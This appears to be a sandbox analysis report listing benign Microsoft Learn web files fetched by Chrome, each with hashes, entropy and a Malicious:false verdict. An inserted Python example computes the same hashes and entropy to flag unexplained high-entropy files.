Preview:{"items":[{"href":"./","toc_title":".NET Framework documentation"},{"href":"get-started/overview","toc_title":"Overview of .NET Framework"},{"children":[{"href":"get-started/","toc_title":"Overview"},{"href":"get-started/out-of-band-releases","toc_title":"Out-of-band releases"},{"href":"get-started/system-requirements","toc_title":"System requirements"}],"toc_title":"Get started"},{"children":[{"href":"install/","toc_title":"Overview"},{"href":"install/guide-for-developers","toc_title":"For developers"},{"children":[{"href":"install/on-windows-11","toc_title":"Windows 11"},{"href":"install/on-windows-10","toc_title":"Windows 10 and Windows Server 2016"},{"href":"install/on-windows-8-1","toc_title":"Windows 8.1 and Windows Server 2012 R2"},{"href":"install/on-windows-8","toc_title":"Windows 8 and Windows Server 2012"},{"href":"install/on-server-2022","toc_title":"Windows Server 2022"},{"href":"install/on-server-2019","toc_title":"Windows Server 2019"}],"toc_title":"By OS version"},{"hre
Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:JSON data
Category:downloaded
Size (bytes):5644
Entropy (8bit):4.785769732002188
Encrypted:false
SSDEEP:96:ogVOjPW7cI3aDNjExAjfWQpL0dpwmWMv7AD8RevyvRJNjyZPtJ27RlhiewZjMeZf:og5cUaDNjESLWQN0dpwm9+6DlUu7lYjX
MD5:B5885C991E30238110973653F2408300
SHA1:39B0A79D951F8254E21821134E047C76F57AD2A8
SHA-256:085BF5AE32E6F7F1299CA79248B0CB67EBD31566728A69F4466E1659C004732E
SHA-512:6BEC209D933C7A1065047637F550B7A36809D835938C04851A3B09DF644BD3EC85A2CE30F73FCFB709FE7AF3453799B2EB76702D0AB2BE067CD07D2EC03537C0
Malicious:false
URL:https://learn.microsoft.com/en-us/content-nav/site-header/site-header.json?
Preview:{"brandLink":{"biName":"learn","displayName":"Learn","href":"/"},"featuredContent":[{"biName":"1-microsoft-learn-for-organizations","description":"Access curated resources to upskill your team and close skills gaps.","href":"/training/organizations/","supertitle":"Microsoft Learn for Organizations","title":"Boost your team\u0027s technical skills"}],"metadata":{"git_commit_id":"dab49ca79cb372010aeaec5e99463f6cec8df000"},"navCategories":[{"biName":"1-discover","panel":{"panelContent":[{"biName":"1-documentation","componentType":"header-panel-card","description":"In-depth articles on Microsoft developer tools and technologies","href":"/docs/","title":"Documentation"},{"biName":"2-training","componentType":"header-panel-card","description":"Personalized learning paths and courses","href":"/training/","title":"Training"},{"biName":"3-credentials","componentType":"header-panel-card","description":"Globally recognized, industry-endorsed credentials","href":"/credentials/","title":"Credential
Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:Web Open Font Format (Version 2), TrueType, length 19696, version 1.0
Category:downloaded
Size (bytes):19696
Entropy (8bit):7.9898910353479335
Encrypted:false
SSDEEP:384:37wfQhsuDSP36Elj0oScS8w3F1ZTt5JwtRGsh1SJR3YL0BeojRs8E:37Cms69owH3FPutReFYL+eods8E
MD5:4D0BFEA9EBDA0657CEE433600ED087B6
SHA1:F13C690B170D5BA6BE45DEDC576776CA79718D98
SHA-256:67E7D8E61B9984289B6F3F476BBEB6CEB955BEC823243263CF1EE57D7DB7AE9A
SHA-512:9136ADEC32F1D29A72A486B4604309AA8F9611663FA1E8D49079B67260B2B09CEFDC3852CF5C08CA9F5D8EA718A16DBD8D8120AC3164B0D1519D8EF8A19E4EA5
Malicious:false
URL:https://learn.microsoft.com/static/assets/0.4.029026183/styles/docons.6a251ae.34a85e0c.woff2
Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1528x402, components 3
Category:dropped
Size (bytes):64291
Entropy (8bit):7.964191793580486
Encrypted:false
SSDEEP:1536:NHnitWEy8ugr5KeKvJx4FqzmYyIf52YHcd/HpQxhSoywkY8+N4U4Bv:NHitHyJTeysFqiYyIfEYHchQWoywkY8v
MD5:8CCB0248B7F2ABEEAD74C057232DF42A
SHA1:C02BD92FEA2DF7ED12C8013B161670B39E1EC52F
SHA-256:0A9FD0C7F32EABBB2834854C655B958EC72A321F3C1CF50035DD87816591CDCC
SHA-512:6D6E3C858886C9D6186AD13B94DBC2D67918AA477FB7D70A7140223FAB435CF109537C51CA7F4B2A0DB00EEAD806BBE8C6B29B947B0BE7044358D2823F5057CE
Malicious:false
Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced
Category:downloaded
Size (bytes):35005
Entropy (8bit):7.980061050467981
Encrypted:false
SSDEEP:768:aHBEr/QXnbCgWotMq4AZZivq2/Qu0cEv1FjHBep6U0Z/68R:ahWqbTWiM7ACvdIdldhep4rR
MD5:522037F008E03C9448AE0AAAF09E93CB
SHA1:8A32997EAB79246BEED5A37DB0C92FBFB006BEF2
SHA-256:983C35607C4FB0B529CA732BE42115D3FCAAC947CEE9C9632F7CACDBDECAF5A7
SHA-512:643EC613B2E7BDBB2F61E1799C189B0E3392EA5AE10845EB0B1F1542A03569E886F4B54D5B38AF10E78DB49C71357108C94589474B181F6A4573B86CF2D6F0D8
Malicious:false
URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/app-could-not-be-started.png
Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:JSON data
Category:downloaded
Size (bytes):4897
Entropy (8bit):4.8007377074457604
Encrypted:false
SSDEEP:96:A0AIvEQ+KfZcbhaW9dp45qtAdflfDOFnymoLByzfwqrLvJ4QG63JkRJ+dRp8TJHr:dgQ+KfZcbhaWjp45qtAdflfDOFnNgByQ
MD5:0E78F790402498FA57E649052DA01218
SHA1:9ED4D0846DA5D66D44EE831920B141BBF60A0200
SHA-256:73F3061A46EA8FD11D674FB21FEEEFE3753FC3A3ED77224E7F66A964C0420603
SHA-512:B46E4B90E53C7DABC7208A6FDAE53F25BD70FCFBBEF03FFC64B1B5D1EB1C01C870A7309DF167246FCCD114B483038A64D7C46CA3B9FCB3779A77E42DB6967051
Malicious:false
URL:https://learn.microsoft.com/en-us/content-nav/MSDocsHeader-DotNet.json?
Preview:{"callToAction":{"primary":{"biName":"download-dotnet","href":"https://dotnet.microsoft.com/download","kind":"link","title":"Download .NET"}},"category":{"biName":"dotnet","href":"/dotnet/","kind":"link","title":".NET"},"items":[{"biName":"1-languages","items":[{"biName":"1-c-sharp","href":"/dotnet/csharp/","kind":"link","title":"C#"},{"biName":"2-f-sharp","href":"/dotnet/fsharp/","kind":"link","title":"F#"},{"biName":"3-visual-basic","href":"/dotnet/visual-basic/","kind":"link","title":"Visual Basic"}],"kind":"menu","title":"Languages"},{"biName":"2-features","items":[{"biName":"1-fundamental","href":"/dotnet/fundamentals/","kind":"link","title":"Fundamentals"},{"biName":"2-tools-and-diagnostics","href":"/dotnet/navigate/tools-diagnostics/","kind":"link","title":"Tools and diagnostics"},{"biName":"3-ai","items":[{"biName":"1-generative-ai","href":"/dotnet/ai/","kind":"link","title":"Generative AI"},{"biName":"2-mlnet","href":"/dotnet/machine-learning/","kind":"link","title":"ML.NET"}]
Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:JSON data
Category:dropped
Size (bytes):72
Entropy (8bit):4.241202481433726
Encrypted:false
SSDEEP:3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
MD5:9E576E34B18E986347909C29AE6A82C6
SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
Malicious:false
Preview:{"Message":"The requested resource does not support http method 'GET'."}
Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1528x402, components 3
Category:downloaded
Size (bytes):64291
Entropy (8bit):7.964191793580486
Encrypted:false
SSDEEP:1536:NHnitWEy8ugr5KeKvJx4FqzmYyIf52YHcd/HpQxhSoywkY8+N4U4Bv:NHitHyJTeysFqiYyIfEYHchQWoywkY8v
MD5:8CCB0248B7F2ABEEAD74C057232DF42A
SHA1:C02BD92FEA2DF7ED12C8013B161670B39E1EC52F
SHA-256:0A9FD0C7F32EABBB2834854C655B958EC72A321F3C1CF50035DD87816591CDCC
SHA-512:6D6E3C858886C9D6186AD13B94DBC2D67918AA477FB7D70A7140223FAB435CF109537C51CA7F4B2A0DB00EEAD806BBE8C6B29B947B0BE7044358D2823F5057CE
Malicious:false
URL:https://learn.microsoft.com/en-us/media/event-banners/banner-learn-challenge-2024.jpg
                                                                                                                                                                                                                                          Preview:......JFIF..............ICC_PROFILE............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6...C....................................................................C............................................................................"..........................................\......................!1..A.Qaq......".....#23BR......56Urst....$%4ST....&CDbcd......EFV.u...................................[...........................!1.AQR...."2Saq.......Ts.......#356BCDUbr.....%&47c.....$'Et..............?...j.....'Gu..7.=......8. ..nh..F.....y ..=....1L\U.+.Pj.RnI.(...N.{%].b..J..r...W[
                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          File Type:exported SGML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1173007
                                                                                                                                                                                                                                          Entropy (8bit):5.503893944397598
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24576:VMga+4IVzOjS1Jho1WXQFjTEr39/jHXzT:VMcVzOjS1Jho1WXQar39/bXzT
                                                                                                                                                                                                                                          MD5:2E00D51C98DBB338E81054F240E1DEB2
                                                                                                                                                                                                                                          SHA1:D33BAC6B041064AE4330DCC2D958EBE4C28EBE58
                                                                                                                                                                                                                                          SHA-256:300480069078B5892D2363A2B65E2DFBBF30FE5C80F83EDBFECF4610FD093862
                                                                                                                                                                                                                                          SHA-512:B6268D980CE9CB729C82DBA22F04FD592952B2A1AAB43079CA5330C68A86E72B0D232CE4070DB893A5054EE5C68325C92C9F1A33F868D61EBB35129E74FC7EF9
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:(function(){"use strict";var __webpack_modules__={351:function(t,e,r){var n,o=this&&this.__extends||(n=function(t,e){return n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}||function(t,e){for(var r in e)Object.prototype.hasOwnProperty.call(e,r)&&(t[r]=e[r])},n(t,e)},function(t,e){if("function"!=typeof e&&null!==e)throw new TypeError("Class extends value "+String(e)+" is not a constructor or null");function r(){this.constructor=t}n(t,e),t.prototype=null===e?Object.create(e):(r.prototype=e.prototype,new r)}),i=this&&this.__assign||function(){return i=Object.assign||function(t){for(var e,r=1,n=arguments.length;r<n;r++)for(var o in e=arguments[r])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]);return t},i.apply(this,arguments)},s=this&&this.__read||function(t,e){var r="function"==typeof Symbol&&t[Symbol.iterator];if(!r)return t;var n,o,i=r.call(t),s=[];try{for(;(void 0===e||e-- >0)&&!(n=i.next()).done;)s.push(n.value)}catch(t){o={error:t}}finally
                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                          Size (bytes):1154
                                                                                                                                                                                                                                          Entropy (8bit):4.59126408969148
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:txFRuJpzYeGK+VS6ckNL2091JP/UcHc8oQJ1sUWMLc/jH6GbKqjHJIOHA:JsfcU6ckNL2091Z/U/YsUDM+GhS
                                                                                                                                                                                                                                          MD5:37258A983459AE1C2E4F1E551665F388
                                                                                                                                                                                                                                          SHA1:603A4E9115E613CC827206CF792C62AEB606C941
                                                                                                                                                                                                                                          SHA-256:8E34F3807B4BF495D8954E7229681DA8D0DD101DD6DDC2AD7F90CD2983802B44
                                                                                                                                                                                                                                          SHA-512:184CB63EF510143B0AF013F506411C917D68BB63F2CFA47EA2A42688FD4F55F3B820AF94F87083C24F48AACEE6A692199E185FC5C5CFBED5D70790454EED7F5C
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          URL:https://learn.microsoft.com/en-us/media/logos/logo_net.svg
                                                                                                                                                                                                                                          Preview:<svg width="456" height="456" viewBox="0 0 456 456" fill="none" xmlns="http://www.w3.org/2000/svg">..<rect width="456" height="456" fill="#512BD4"/>..<path d="M81.2738 291.333C78.0496 291.333 75.309 290.259 73.052 288.11C70.795 285.906 69.6665 283.289 69.6665 280.259C69.6665 277.173 70.795 274.529 73.052 272.325C75.309 270.121 78.0496 269.019 81.2738 269.019C84.5518 269.019 87.3193 270.121 89.5763 272.325C91.887 274.529 93.0424 277.173 93.0424 280.259C93.0424 283.289 91.887 285.906 89.5763 288.11C87.3193 290.259 84.5518 291.333 81.2738 291.333Z" fill="white"/>..<path d="M210.167 289.515H189.209L133.994 202.406C132.597 200.202 131.441 197.915 130.528 195.546H130.044C130.474 198.081 130.689 203.508 130.689 211.827V289.515H112.149V171H134.477L187.839 256.043C190.096 259.57 191.547 261.994 192.192 263.316H192.514C191.977 260.176 191.708 254.859 191.708 247.365V171H210.167V289.515Z" fill="white"/>..<path d="M300.449 289.515H235.561V171H297.87V187.695H254.746V221.249H294.485V237.861H254.746V
                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (33273), with no line terminators
                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                          Size (bytes):33273
                                                                                                                                                                                                                                          Entropy (8bit):4.918756013698695
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:384:FnvJOb4OLIch+KCnMet7NPXlJl+HjZjBTRdE0zIwHdZ4vNNpUjV8din4E9hLUukj:5hOEO8chkMet7pCjBfcHkWOzUukj
                                                                                                                                                                                                                                          MD5:86E84C732A96BF9CF18C99B48DB90B6D
                                                                                                                                                                                                                                          SHA1:6A8C212067CB9FE5B8325AE1E89FCA3E7FCF20FA
                                                                                                                                                                                                                                          SHA-256:B54678C5BFB00DC1AFBF2E52C56F8E10173975C25FB19062EFE5DC86F1B7D769
                                                                                                                                                                                                                                          SHA-512:AD91A78371074B5BB2105A9AE69664371C235B7C82DFD25C9ED17F435E92018F2A0DD42203F403D7A75DF4FC63966017519F118B2B22F0DE7656B2B155636AA2
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          URL:https://learn.microsoft.com/en-us/dotnet/framework/toc.json
                                                                                                                                                                                                                                          Preview:{"items":[{"href":"./","toc_title":".NET Framework documentation"},{"href":"get-started/overview","toc_title":"Overview of .NET Framework"},{"children":[{"href":"get-started/","toc_title":"Overview"},{"href":"get-started/out-of-band-releases","toc_title":"Out-of-band releases"},{"href":"get-started/system-requirements","toc_title":"System requirements"}],"toc_title":"Get started"},{"children":[{"href":"install/","toc_title":"Overview"},{"href":"install/guide-for-developers","toc_title":"For developers"},{"children":[{"href":"install/on-windows-11","toc_title":"Windows 11"},{"href":"install/on-windows-10","toc_title":"Windows 10 and Windows Server 2016"},{"href":"install/on-windows-8-1","toc_title":"Windows 8.1 and Windows Server 2012 R2"},{"href":"install/on-windows-8","toc_title":"Windows 8 and Windows Server 2012"},{"href":"install/on-server-2022","toc_title":"Windows Server 2022"},{"href":"install/on-server-2019","toc_title":"Windows Server 2019"}],"toc_title":"By OS version"},{"hre
                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          File Type:PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):35005
                                                                                                                                                                                                                                          Entropy (8bit):7.980061050467981
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:768:aHBEr/QXnbCgWotMq4AZZivq2/Qu0cEv1FjHBep6U0Z/68R:ahWqbTWiM7ACvdIdldhep4rR
                                                                                                                                                                                                                                          MD5:522037F008E03C9448AE0AAAF09E93CB
                                                                                                                                                                                                                                          SHA1:8A32997EAB79246BEED5A37DB0C92FBFB006BEF2
                                                                                                                                                                                                                                          SHA-256:983C35607C4FB0B529CA732BE42115D3FCAAC947CEE9C9632F7CACDBDECAF5A7
                                                                                                                                                                                                                                          SHA-512:643EC613B2E7BDBB2F61E1799C189B0E3392EA5AE10845EB0B1F1542A03569E886F4B54D5B38AF10E78DB49C71357108C94589474B181F6A4573B86CF2D6F0D8
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:.PNG........IHDR..............[.U....sRGB.........gAMA......a.....pHYs..........+.....RIDATx^..`........B hpwww(PJ....R.B.....K[j....@ H ..r:...].P._.`...K.ffg.v.ygf.TM.4.m...`.D".H$......"##..2e.X.t..Y".H$...d..PK.V".H$..uVm.,.H$.....b+.H$.I-#.V".H$.ZF..D".H$...[.D".Hj.)...D"..2Rl%..D".e..J$..DR.H..H$.....b+.H$..9..Neee.X,.B.\/.....o.b+.H$..9...q...EHU*....p.....=z....b.7.q..........N.. ....cUAX.9...m'_...2.`.g{...4.H.9.p.4...K ^.....`.|.n*..]..m..`W..W.H.~..|.^.a..K.6......_....K..w....9......^.....&...R....[...w..Ix=.:..^/..Epp0.5.....QRR...l....S.b.5.c.6...5..8.\....z...I......&.>....../.{.=...]'c......[.E`@Cg......Z.....c.f..,.y|,.{.o@.j..2..:.&l4.{.]Ll.N.0..b:b...g.n.........I...Ewc....[..,i`v......F...il|.c,{.-.....%BP.U........y.x....6..E2..n.W...J .*..`..r....F....#BCC......|.L&........O...'........\.....;...q.n$...7...ga..x....)..A...0.{1..'1../...+yRC...W.-..b..c0dDG...U[po....2eG.G.../.@........h.:.k?.......Q...
                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          File Type:PNG image data, 658 x 480, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):13842
                                                                                                                                                                                                                                          Entropy (8bit):7.802399161550213
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:192:NLNf+jBQsDHg7av3EEondO8PuRu2mIYXEIiDm42NpsHFMHfgnJ4K2DVwv:NLt+1jDmY+ndXwjLUpiDwpzfwoDVk
                                                                                                                                                                                                                                          MD5:F6EC97C43480D41695065AD55A97B382
                                                                                                                                                                                                                                          SHA1:D9C3D0895A5ED1A3951B8774B519B8217F0A54C5
                                                                                                                                                                                                                                          SHA-256:07A599FAB1E66BABC430E5FED3029F25FF3F4EA2DD0EC8968FFBA71EF1872F68
                                                                                                                                                                                                                                          SHA-512:22462763178409D60609761A2AF734F97B35B9A818EC1FD9046AFAB489AAD83CE34896EE8586EFE402EA7739ECF088BC2DB5C1C8E4FB39E6A0FC5B3ADC6B4A9B
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:.PNG........IHDR................1....sRGB.........gAMA......a.....pHYs..........o.d..5.IDATx^..[.,.]...../<.!.B(/y..).F\r...!(.H..a ..B.~..A..KXA.M...6..8...!1....l./.X.1....2.`.y"l..R...V.....{...}._gWW.Z.VUw.N...U..P@..... ..@.A...".$..E.I.........$..("H..PD..... ..p....U.}.{.....l..A.....A........s.......D.0...@....E..x........L. /.".A.....$...Y."...%.I..["../.&.I..[`.0..IA.........p4.I.........$..("H..PD..... ..@.A...".$..E.I.........$..("H..PD..... ..@.A...".$..E.>H...O.................?.~.......].7.....a?....(H....m.G..G..a.P..?yo......f?...o. .B.....mo{[....:9<].....7.....a.....S..Cd.5,.R....#....>......._g.....Wo|.....z.g.........w.T...]x.>.....y(.........6....[..px...U....~.~hu...}H.......~.L... ....r...iY.$..Id..Ax"../....._..U....OTo|.Mh.km..A.k..k....n.C`|._\=...o...a.e.. ...&.A2..k.. ....X.+...C..P....y..>.{._..(H....8(.?...w.}M.........:s_!.m.........BY..T..z.5{.W.~..6.....F....bq....m.....?.......v....o..o...ki...iX.$......\]V...V...
                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):4897
                                                                                                                                                                                                                                          Entropy (8bit):4.8007377074457604
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:96:A0AIvEQ+KfZcbhaW9dp45qtAdflfDOFnymoLByzfwqrLvJ4QG63JkRJ+dRp8TJHr:dgQ+KfZcbhaWjp45qtAdflfDOFnNgByQ
                                                                                                                                                                                                                                          MD5:0E78F790402498FA57E649052DA01218
                                                                                                                                                                                                                                          SHA1:9ED4D0846DA5D66D44EE831920B141BBF60A0200
                                                                                                                                                                                                                                          SHA-256:73F3061A46EA8FD11D674FB21FEEEFE3753FC3A3ED77224E7F66A964C0420603
                                                                                                                                                                                                                                          SHA-512:B46E4B90E53C7DABC7208A6FDAE53F25BD70FCFBBEF03FFC64B1B5D1EB1C01C870A7309DF167246FCCD114B483038A64D7C46CA3B9FCB3779A77E42DB6967051
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:{"callToAction":{"primary":{"biName":"download-dotnet","href":"https://dotnet.microsoft.com/download","kind":"link","title":"Download .NET"}},"category":{"biName":"dotnet","href":"/dotnet/","kind":"link","title":".NET"},"items":[{"biName":"1-languages","items":[{"biName":"1-c-sharp","href":"/dotnet/csharp/","kind":"link","title":"C#"},{"biName":"2-f-sharp","href":"/dotnet/fsharp/","kind":"link","title":"F#"},{"biName":"3-visual-basic","href":"/dotnet/visual-basic/","kind":"link","title":"Visual Basic"}],"kind":"menu","title":"Languages"},{"biName":"2-features","items":[{"biName":"1-fundamental","href":"/dotnet/fundamentals/","kind":"link","title":"Fundamentals"},{"biName":"2-tools-and-diagnostics","href":"/dotnet/navigate/tools-diagnostics/","kind":"link","title":"Tools and diagnostics"},{"biName":"3-ai","items":[{"biName":"1-generative-ai","href":"/dotnet/ai/","kind":"link","title":"Generative AI"},{"biName":"2-mlnet","href":"/dotnet/machine-learning/","kind":"link","title":"ML.NET"}]
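The entries above are the per-file triage fingerprints the report records for every dropped or downloaded file: size, 8-bit entropy, ssdeep, and MD5/SHA1/SHA-256/SHA-512, plus an Encrypted verdict that stays false even for the JPEG and PNG entries sitting at entropy 7.96 to 7.98. As an added example that is not part of the Joe Sandbox report or of its tooling, the Python below reproduces the hash and entropy fields for a local buffer and shows why entropy has to be read together with the file type: compressed media legitimately sits close to 8 bits per byte, whereas an MZ-headed buffer at that entropy is what deserves a second look. The 7.9 threshold, the magic-byte table and the sample buffers are assumptions constructed for the example, not values taken from the report; ssdeep is left out because it needs an external library.

```python
import hashlib
import math
from collections import Counter

# Assumed magic-byte table for a coarse type guess (constructed for this example,
# not the signature database the sandbox uses).
MAGIC = [
    (b"\xff\xd8\xff", "JPEG"),
    (b"\x89PNG\r\n\x1a\n", "PNG"),
    (b"PK\x03\x04", "ZIP"),
    (b"MZ", "PE"),
]
# Types whose bodies are compressed and therefore legitimately high-entropy.
COMPRESSED_TYPES = {"JPEG", "PNG", "ZIP"}
# Assumed threshold above which entropy the type does not explain is worth a closer look.
ENTROPY_THRESHOLD = 7.9


def shannon_entropy_8bit(data: bytes) -> float:
    """Shannon entropy over byte values, in bits per byte (0.0 to 8.0)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def guess_type(data: bytes) -> str:
    """Coarse type from the leading bytes; 'text' for printable ASCII, else 'unknown'."""
    for magic, name in MAGIC:
        if data.startswith(magic):
            return name
    if data and all(b in (9, 10, 13) or 32 <= b < 127 for b in data):
        return "text"
    return "unknown"


def file_record(data: bytes) -> dict:
    """Size, entropy and hash fields of a report entry, digests upper-cased as in the report."""
    return {
        "Size (bytes)": len(data),
        "Entropy (8bit)": shannon_entropy_8bit(data),
        "MD5": hashlib.md5(data).hexdigest().upper(),
        "SHA1": hashlib.sha1(data).hexdigest().upper(),
        "SHA-256": hashlib.sha256(data).hexdigest().upper(),
        "SHA-512": hashlib.sha512(data).hexdigest().upper(),
    }


def triage(data: bytes, threshold: float = ENTROPY_THRESHOLD) -> dict:
    """file_record() plus a type guess and a flag for high entropy the type does not explain."""
    rec = file_record(data)
    kind = guess_type(data)
    rec["File Type (guess)"] = kind
    rec["Unexplained high entropy"] = (
        rec["Entropy (8bit)"] > threshold and kind not in COMPRESSED_TYPES
    )
    return rec


def constructed_bytes(n: int, seed: bytes = b"example-seed") -> bytes:
    """Deterministic near-uniform bytes from SHA-256 of a counter (constructed sample input)."""
    out = bytearray()
    i = 0
    while len(out) < n:
        out += hashlib.sha256(seed + i.to_bytes(4, "big")).digest()
        i += 1
    return bytes(out[:n])


if __name__ == "__main__":
    # Constructed samples: a PNG-headed and an MZ-headed high-entropy body, and plain JSON text.
    samples = {
        "png-like": b"\x89PNG\r\n\x1a\n" + constructed_bytes(65536),
        "pe-like": b"MZ" + constructed_bytes(65536),
        "json-text": b'{"items":[{"href":"./","toc_title":".NET Framework documentation"}]}',
    }
    for name, blob in samples.items():
        rec = triage(blob)
        print(f"{name}: type={rec['File Type (guess)']} entropy={rec['Entropy (8bit)']:.3f} "
              f"flag={rec['Unexplained high entropy']} sha256={rec['SHA-256'][:16]}...")
```

Run it against a real dropped file by reading the file as bytes and passing it to triage(); the MD5/SHA1/SHA-256/SHA-512 values can then be compared directly with the report's fields, and the flag separates a high-entropy image from a high-entropy executable that a packer or crypter may have produced.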
Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:ASCII text, with very long lines (46884)
Category:downloaded
Size (bytes):1817143
Entropy (8bit):5.501007973622959
Encrypted:false
SSDEEP:24576:aLX8PHFluFxBSB1DkCXWjfz8gEPPXL/tie:auHFluFxBSB1DkCXWjfz7EPPXztH
MD5:F57E274AE8E8889C7516D3E53E3EB026
SHA1:F8D21465C0C19051474BE6A4A681FA0B0D3FCC0C
                                                                                                                                                                                                                                          SHA-256:2A2198DDBDAEDD1E968C0A1A45F800765AAE703675E419E46F6E51E3E9729D01
                                                                                                                                                                                                                                          SHA-512:9A9B42F70E09D821B799B92CB6AC981236FCF190F0A467CA7F7D382E3BCA1BC1D71673D37CD7426499D24DFBC0B7A6D10676C0E3FB2B0292249A5ABAB78F23F4
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          URL:https://learn.microsoft.com/static/assets/0.4.029026183/scripts/en-us/index-docs.js
                                                                                                                                                                                                                                          Preview:"use strict";(()=>{var hve=Object.create;var _T=Object.defineProperty;var E2=Object.getOwnPropertyDescriptor;var bve=Object.getOwnPropertyNames;var _ve=Object.getPrototypeOf,vve=Object.prototype.hasOwnProperty;var yve=(e,t,o)=>t in e?_T(e,t,{enumerable:!0,configurable:!0,writable:!0,value:o}):e[t]=o;var Ie=(e,t)=>()=>(t||e((t={exports:{}}).exports,t),t.exports);var xve=(e,t,o,n)=>{if(t&&typeof t=="object"||typeof t=="function")for(let r of bve(t))!vve.call(e,r)&&r!==o&&_T(e,r,{get:()=>t[r],enumerable:!(n=E2(t,r))||n.enumerable});return e};var Ya=(e,t,o)=>(o=e!=null?hve(_ve(e)):{},xve(t||!e||!e.__esModule?_T(o,"default",{value:e,enumerable:!0}):o,e));var U=(e,t,o,n)=>{for(var r=n>1?void 0:n?E2(t,o):t,s=e.length-1,i;s>=0;s--)(i=e[s])&&(r=(n?i(t,o,r):i(r))||r);return n&&r&&_T(t,o,r),r};var ji=(e,t,o)=>(yve(e,typeof t!="symbol"?t+"":t,o),o),yR=(e,t,o)=>{if(!t.has(e))throw TypeError("Cannot "+o)};var wt=(e,t,o)=>(yR(e,t,"read from private field"),o?o.call(e):t.get(e)),Bo=(e,t,o)=>{if(t.has(
                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                          Size (bytes):3130
                                                                                                                                                                                                                                          Entropy (8bit):4.790069981348324
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:48:YWuGl640ynAqgDJ9OJWuO6Z3Db8VgK/ni47ttbtlSlA37ERw7II77Aj5M1:Nv0ynAhD3CO5t5lNEYIOEjc
                                                                                                                                                                                                                                          MD5:EBA6E81304F2F555E1D2EA3126A18A41
                                                                                                                                                                                                                                          SHA1:61429C3FE837FD4DD68E7B26678F131F2E00070D
                                                                                                                                                                                                                                          SHA-256:F309CCCE17B2B4706E7110F6C76F81761F0A44168D12C358AC4D120776907F81
                                                                                                                                                                                                                                          SHA-512:3BE0466794E7BDDC8565758DBF5553E89ED0003271F07695F09283F242BB65C1978ED79A38D5E589A99F68C0130E1E4B52576D7CD655EE272EE104BE0378E72E
                                                                                                                                                                                                                                          Malicious:false
